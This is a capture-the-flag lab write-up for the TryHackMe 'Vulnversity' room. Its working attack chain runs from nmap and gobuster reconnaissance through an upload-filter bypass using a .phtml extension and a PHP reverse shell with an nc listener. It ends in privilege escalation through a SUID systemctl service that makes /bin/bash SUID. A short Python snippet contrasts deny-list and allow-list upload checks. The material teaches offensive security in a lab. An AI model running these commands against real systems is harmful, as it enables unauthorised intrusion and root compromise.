This is the write-up for the room Vulnversity on TryHackMe; it is part of the Complete Beginner path.
Connect to the TryHackMe lab environment either through the VPN or by using the AttackBox on the TryHackMe site.
Tasks Vulnversity
Task 1
Deploy the machine attached to the task and press complete
Task 2
Before reading on, start scanning the box by typing in the following command:
nmap -sV -sC <machine ip>
2.1 There are many nmap “cheatsheets” online that you can use too.
Press complete
2.2 Scan the box, how many ports are open?
Answer: 6
2.3 What version of the squid proxy is running on the machine?
We can find this in the results of the nmap scan.
Answer: 3.5.12
2.4 How many ports will nmap scan if the flag -p-400 was used?
You can find the answer in the man pages. The easiest way to find it is to type in
man nmap | less +/-p-
More information about nmap can also be found in the Nmap room.
Answer: 400
2.5 Using the nmap flag -n what will it not resolve?
Answer: DNS
2.6 What is the most likely operating system this machine is running?
It is already revealed in the output of the nmap scan.
Answer: Ubuntu
2.7 What port is the web server running on?
We can find it in the nmap scan.
Answer: 3333
Task 3
3.1 What is the directory that has an upload form page?
First type in the command (do not copy it; type it in yourself, because for some reason copy/pasting sometimes breaks the gobuster command):
gobuster dir -u http://<ip>:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
If you want to use a GUI interface instead, type in
dirbuster&
We find an odd one named internal. Navigating to it reveals a page.
Answer: internal
Task 4
4.1 Try upload a few file types to the server, what common extension seems to be blocked?
Trying to upload a PHP file is blocked. We get the error "Extension not allowed".
Answer: .php
4.2 To identify which extensions are not blocked, we’re going to fuzz the upload form.
If you do not know what Burp Suite is and what it can do, please take a look at these write-ups.
Start Burp Suite and press complete.
4.3 Run this attack, what extension is allowed?
Make a file with the extensions stated in the task:
nano phpext.txt
Put the following extensions inside the file and save it:
.php
.php3
.php4
.php5
.phtml
In Firefox, turn on FoxyProxy for Burp Suite.
If you do not know what this is or how to configure it, please read this blog: Configure Burpsuite with Firefox
Refresh the site and turn on intercept in Burp Suite. Then upload a file and see what happens in Burp Suite.
Now right-click the request and send it to Intruder.
Now navigate to Intruder and set the positions as in the screenshot.
Now navigate to the Payloads tab and import the created list.
All the way at the bottom, turn off URL encoding.
Now press the attack button.
Notice the difference in Length between the responses.
Answer: .phtml
Now turn off the proxy intercept.
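As an added illustration (not code from the room or from the original write-up) of why only .php was rejected while .phtml went through: a deny-list that checks the final extension, beside an allow-list version; the image-extension allow-list is an assumed use case, and the fuzz list is the one from the task.

```python
import os

# Extensions the room's upload form rejects (only .php, per the write-up);
# everything else, including .phtml, is accepted. Reconstructed deny-list.
DENYLIST = {".php"}

# Hardened alternative: accept only the extensions the feature needs
# (an assumed image-upload use case), never anything the server executes.
ALLOWLIST = {".png", ".jpg", ".jpeg", ".gif"}

# Extensions from the fuzz list used in task 4.3
FUZZ_LIST = [".php", ".php3", ".php4", ".php5", ".phtml"]


def last_extension(filename: str) -> str:
    """Return the final extension, lower-cased, e.g. 'Shell.PHTML' -> '.phtml'."""
    return os.path.splitext(os.path.basename(filename))[1].lower()


def denylist_accepts(filename: str) -> bool:
    """Weak check: block a few known-bad extensions, allow the rest."""
    return last_extension(filename) not in DENYLIST


def allowlist_accepts(filename: str) -> bool:
    """Hardened check: allow a fixed set of safe extensions only, and reject
    double extensions such as 'shell.phtml.jpg', which some web servers
    still hand to the PHP handler."""
    parts = os.path.basename(filename).lower().split(".")
    if len(parts) != 2 or not parts[0]:
        return False  # no extension, hidden file, or more than one extension
    return "." + parts[1] in ALLOWLIST


def fuzz_results(check) -> dict:
    """Run every extension from the fuzz list through a check, as Intruder did."""
    return {ext: check("webshell" + ext) for ext in FUZZ_LIST}


if __name__ == "__main__":
    print("deny-list :", fuzz_results(denylist_accepts))
    print("allow-list:", fuzz_results(allowlist_accepts))
```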
4.4 What is the name of the user who manages the webserver?
We are not going to download the webshell, as Kali provides it under /usr/share/webshells/php.
Now copy this file to your Documents directory. Do not edit the original in /usr/share.
cp /usr/share/webshells/php/php-reverse-shell.php ~/Documents/webshell.php
Now edit the copy with
nano webshell.php
After you put in your own IP, save the file.
Start a listener in a new terminal by entering the following command:
nc -lvnp 1234
Now rename the file webshell.php to webshell.phtml and upload it.
Now navigate to
http://<ip>:3333/internal/uploads/webshell.phtml
In the listener, type in the following command to get a more usable interactive shell:
python -c 'import pty; pty.spawn("/bin/bash")'
4.5 What is the name of the user who manages the webserver?
Navigate to the home directories under /home.
Answer: bill
4.6 What is the user flag?
cat the user.txt in bill's home directory. The output is the answer to the question.
Task 5
5.1 On the system, search for all SUID files. What file stands out?
Type in the following command to find all SUID files:
find / -perm -u=s -type f 2>/dev/null
Answer: /bin/systemctl
5.2 Become root and get the last flag (/root/root.txt)
Take a look at the systemctl entry on GTFOBins.
Type in the following, line by line:
TF2=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/root.txt"
[Install]
WantedBy=multi-user.target' > $TF2
/bin/systemctl link $TF2
/bin/systemctl enable --now $TF2
Now cat /tmp/root.txt
We did not become root; we just used this to read the file we wanted.
I tried using a netcat connection but it did not work for me. You can change anything in this line to get what you want
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/root.txt"
Now, how do we become root?
Why not start a shell as root? Within this service, use
ExecStart=/bin/sh -c "chmod +s /bin/bash"
TF2=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target' > $TF2
/bin/systemctl link $TF2
/bin/systemctl enable --now $TF2
/bin/bash -p